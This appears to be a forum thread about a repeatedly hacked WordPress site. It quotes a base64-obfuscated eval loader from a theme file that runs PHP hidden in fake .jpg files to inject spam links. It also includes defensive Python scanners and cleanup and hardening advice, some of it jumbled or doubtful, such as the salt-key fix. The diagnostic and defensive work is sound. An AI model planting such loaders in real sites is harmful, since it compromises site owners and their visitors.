I have a Wordpress site that keeps getting hacked. As far as I can tell the following changes are being made:
This file has some additional PHP code at the top:
wp-content/themes/enfold/functions.php
as follows:
eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
and 4 new jpg files are being created:
/wp-includes/images/geo.jpg
/wp-includes/images/save.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/links.jpg
These are not real jpg files as they don't open, but looking at them with a text editor reveals text and additional PHP code.
From looking at the PHP code it looks like it's trying to inject some spam/advertising links into my Wordpress POSTS.
I keep deleting these files, I've installed a security plugin, removed the admin login, changed all my passwords, but these files continue to get updated/created every few days.
I'm trying to understand how this is possible and what I need to do next to block this.
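To see what that one-line stub does, and to find the fake images mechanically rather than by eye, here is an added Python example (it is not code from the question or from either answer). It decodes every eval(base64_decode("...")) it finds in .php files and flags files with an image extension whose bytes are PHP rather than JPEG/PNG/GIF. Decoding the blob quoted in the question gives `function callback($chee){require("/home/databuzz/public_html/wp-includes/images/magic.jpg");return ($chee);}ob_start("callback");`: on every page render the theme registers an output-buffer callback, the PHP hidden in magic.jpg runs inside that callback with the finished page HTML in $chee, and whatever it returns is what the visitor (and search engines) see. That is the mechanism behind the injected links. Only the base64 string is taken from the question; the sample tree the script builds (file paths, the JFIF header of real.jpg, the contents of the magic.jpg stand-in) is constructed for the demo.

```python
"""Find the two artefacts from the question: eval(base64_decode(...)) stubs in PHP files
and "images" that are really PHP. Added example, not code from the original page."""
import base64
import binascii
import os
import re
import tempfile

# The one-line stub the question shows at the top of functions.php.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')

# Byte signatures of real JPEG / PNG / GIF files.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}

# Copied verbatim from the question; everything else in this file is constructed.
STUB = ('eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6'
        'L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9'
        'b2Jfc3RhcnQoImNhbGxiYWNrIik7"));')


def decode_eval_payloads(php_source: str) -> list:
    """Plaintext of every eval(base64_decode("...")) call found in php_source."""
    decoded = []
    for blob in EVAL_B64.findall(php_source):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except binascii.Error:
            decoded.append("<undecodable: " + blob[:24] + "...>")
    return decoded


def is_fake_image(path: str) -> bool:
    """True when the extension says image but the bytes say PHP."""
    if os.path.splitext(path)[1].lower() not in IMAGE_EXTS:
        return False
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if head.startswith(IMAGE_MAGIC):
        return False
    return b"<?php" in head or b"<?=" in head


def scan_tree(root: str) -> dict:
    """Walk root; return decoded eval stubs per .php file and the list of fake images."""
    report = {"eval_payloads": {}, "fake_images": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.lower().endswith(".php"):
                with open(full, "rb") as fh:
                    payloads = decode_eval_payloads(fh.read().decode("utf-8", "replace"))
                if payloads:
                    report["eval_payloads"][rel] = payloads
            elif is_fake_image(full):
                report["fake_images"].append(rel)
    report["fake_images"].sort()
    return report


def build_sample_site() -> str:
    """Constructed miniature of the infected layout in a temp dir (hypothetical contents)."""
    root = tempfile.mkdtemp(prefix="wp-scan-")

    def put(rel, data):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

    put("wp-content/themes/enfold/functions.php",
        b"<?php\n" + STUB.encode() + b"\nadd_action('init', 'enfold_setup');\n")
    # Stand-in for magic.jpg: PHP text, no JPEG header. The real dropper body is unknown.
    put("wp-includes/images/magic.jpg",
        b"<?php if (isset($chee)) { $chee .= '<a href=\"http://example.invalid\">spam</a>'; } ?>")
    # A genuine image: JFIF header followed by filler bytes.
    put("wp-includes/images/real.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 64)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    result = scan_tree(site)
    for path, payloads in result["eval_payloads"].items():
        print(path)
        for text in payloads:
            print("    decodes to:", text)
    print("fake images:", result["fake_images"])
```

Run it against the real document root (`scan_tree("/home/.../public_html")`) after taking a copy for evidence; the decoded require() path also tells you which dropped file is the live one, so that file is worth keeping for analysis rather than deleting blindly.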
First of all - DON'T PANIC.
Installing antivirus or security plugins at this point will rarely help - the malicious code already has server access.
1 - Change ALL the passwords for FTP, mysql, DB, cPanel, WHM, SSH (disable it if not needed) etc. - anything with access.
3 - Check your server (all folders like cgi, cgi-bin, ftp etc.). Delete the whole wordpress folder (except wp-content), and all other strange files. Delete all themes and all plugins and check the rest of wp-content manually and attentively. Back up the DB and manually check it.
3.1 - (EDIT 1) - Disallow indexes in cPanel / WHM, and read below for .htaccess protections.
2 - Upload new wordpress CORE files to their OWN directory (not the root) and rename it to something else (not wp or wordpress).
3 - Update plugins and themes - do not copy the ones you have, but install fresh, updated ones from the wp plugin repository, and a fresh, clean theme. Manually check if necessary.
In your theme, check all forms or input fields, and check for correct validation of input.
4 - Change all the DB passwords in wp-config. All the hashes etc.
Create a new database AND user AND new passwords. Manually check the DB backup BEFORE injecting it back.
4.1 - (EDIT I) I forgot to mention - change the DB prefix as well. Do not leave the default wp_.
5 - Change all wp user passwords AND usernames.
If you have an open site with hundreds of users then make a script to force everyone to change passwords. If you have only a dozen, change them manually.
When I said all - it includes the default admin user (from past versions).
6 - After some time, check your server log and see if the 404 messages for the fake image files come from a single IP address (probably not) - if they do, block it.
7 - There is not much more you can do, except being careful. It is a lot of work, but do not be lazy and follow all the steps. Otherwise it is not just this one site, but the whole server that could be compromised. Again and again.
Guidelines for that not happening again:
- Choose strong passwords. We all dislike passwords that look like aDf34HG§*#sFGT, but they ARE helpful - especially for the DB or other automated tasks. For users - force at least one symbol and one letter.
- Do not install themes and plugins that you do not know, do not fully understand, or that you have downloaded from questionable sources (all-wp-premium-themes-for-free-and-direct-download-all-plugins-for-free etc.).
- Keep the wordpress core files updated.
- Check the server every once in a while manually.
.htaccess
Some directives that can prevent (or at least try to prevent) this from happening again. They go in the .htaccess file in the root directory of WordPress.
#Disallow indexes
Options All -Indexes
# protect wp-config.php
# (Order/Deny/Allow is Apache 2.2 syntax; Apache 2.4 uses "Require all denied" instead)
<files wp-config.php>
Order deny,allow
Deny from all
</files>
# WPhtC: Protect .htaccess file (any file name starting with .hta)
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>
robots.txt
User-agent: *
Disallow: /wp-*
Another thing you can do is force users (and yourself) to use SSL (HTTPS) when logging in to admin, in wp-config.php:
define('FORCE_SSL_LOGIN', true); // deprecated since WordPress 4.0; FORCE_SSL_ADMIN covers both login and admin there
After that - you will also need to peek at your DB to see if you have strange columns / tables / entries / users. For example, if your site is constantly being redirected - check for strings like eval(), exec() etc.
You could also use some of the numerous security plugins for core checksums and for the above-mentioned PHP calls.
There are other, more complicated things, especially on the APACHE side.
If I have more time, I will post a blog entry and link it here. But the above is a good start.
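Step 6 of the answer above (checking whether the 404s for the dropped files come from one address) can be done mechanically. The Python below is an added example, not code from the answer: it parses Apache combined-format access log lines, counts requests for the four dropped files per client IP, optionally restricted to 404s (which is what those requests become once the files are deleted), and renders a deny fragment in the same Order/Deny style as the .htaccess snippet above. The log lines are constructed for the demo using RFC 5737 documentation addresses and are not from the original post; the file list is the one from the question.

```python
"""Per-IP count of requests for the dropped fake-image files in an Apache access log.
Added example, not code from the original page."""
import re
from collections import Counter

# Apache "combined" format; the referer/user-agent pair is optional so that
# "common" format lines parse too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')

# The four files the question lists. After deletion every request for them is a 404 lead.
DROPPED_FILES = frozenset((
    "/wp-includes/images/geo.jpg",
    "/wp-includes/images/save.jpg",
    "/wp-includes/images/magic.jpg",
    "/wp-includes/images/links.jpg",
))

# Constructed sample log: one hit before the files were deleted (200), then 404s.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:02:58:40 +0000] "POST /wp-includes/images/magic.jpg HTTP/1.1" 200 17 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:03:12:01 +0000] "POST /wp-includes/images/magic.jpg HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:03:12:02 +0000] "GET /wp-includes/images/links.jpg?v=2 HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2014:03:15:44 +0000] "GET /wp-includes/images/geo.jpg HTTP/1.1" 404 209 "-" "curl/7.30.0"
192.0.2.10 - - [10/Mar/2014:04:00:00 +0000] "GET /2014/03/hello-world/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2014:04:00:01 +0000] "GET /wp-content/uploads/2014/03/photo.jpg HTTP/1.1" 200 84000 "http://example.invalid/" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Dict of fields for one log line, or None if it is not in combined/common format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # compare paths without the query string
    rec["status"] = int(rec["status"])
    return rec


def hits_on_dropped_files(lines, statuses=None) -> Counter:
    """Requests for the dropped files per client IP; statuses, if given, filters by HTTP status."""
    per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in DROPPED_FILES:
            continue
        if statuses is not None and rec["status"] not in statuses:
            continue
        per_ip[rec["ip"]] += 1
    return per_ip


def deny_block(per_ip: Counter, min_hits: int = 1) -> str:
    """.htaccess fragment (Apache 2.2 Order/Deny syntax, as above) denying the noisy IPs."""
    ips = sorted(ip for ip, n in per_ip.items() if n >= min_hits)
    if not ips:
        return ""
    return "\n".join(["Order allow,deny"] + [f"Deny from {ip}" for ip in ips] + ["Allow from all"])


if __name__ == "__main__":
    hits = hits_on_dropped_files(SAMPLE_LOG.splitlines(), statuses={404})
    for ip, n in hits.most_common():
        print(f"{ip:16} {n} request(s) for dropped files")
    print(deny_block(hits))
```

On a real server feed it the access log (`hits_on_dropped_files(open("/var/log/apache2/access.log"))`). If, as the answer expects, the hits come from many different addresses, the deny list is not what stops the re-infection; whatever still has write access to the tree is, and that is what the cleanup steps are for.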
I ran into this problem with a number of my websites and even after swapping everything out (all new files with only one website, but with the same config file)... I got attacked anyway.
Every day I'd wake up to email alerts saying 30 different files had been edited or replaced. Every time I cleaned it, it would come back a few hours later... But I was puzzled, since it was all new files. The only thing that was the same was the wp-config.php file.
Turns out the hash keys were just way too short. The sites were built 3 years ago but fully updated to this point, but as soon as I changed the hash keys to be a lot longer, the problem stopped.
Example of hash keys:
Here's where you can go to generate new keys:
https://api.wordpress.org/secret-key/1.1/salt/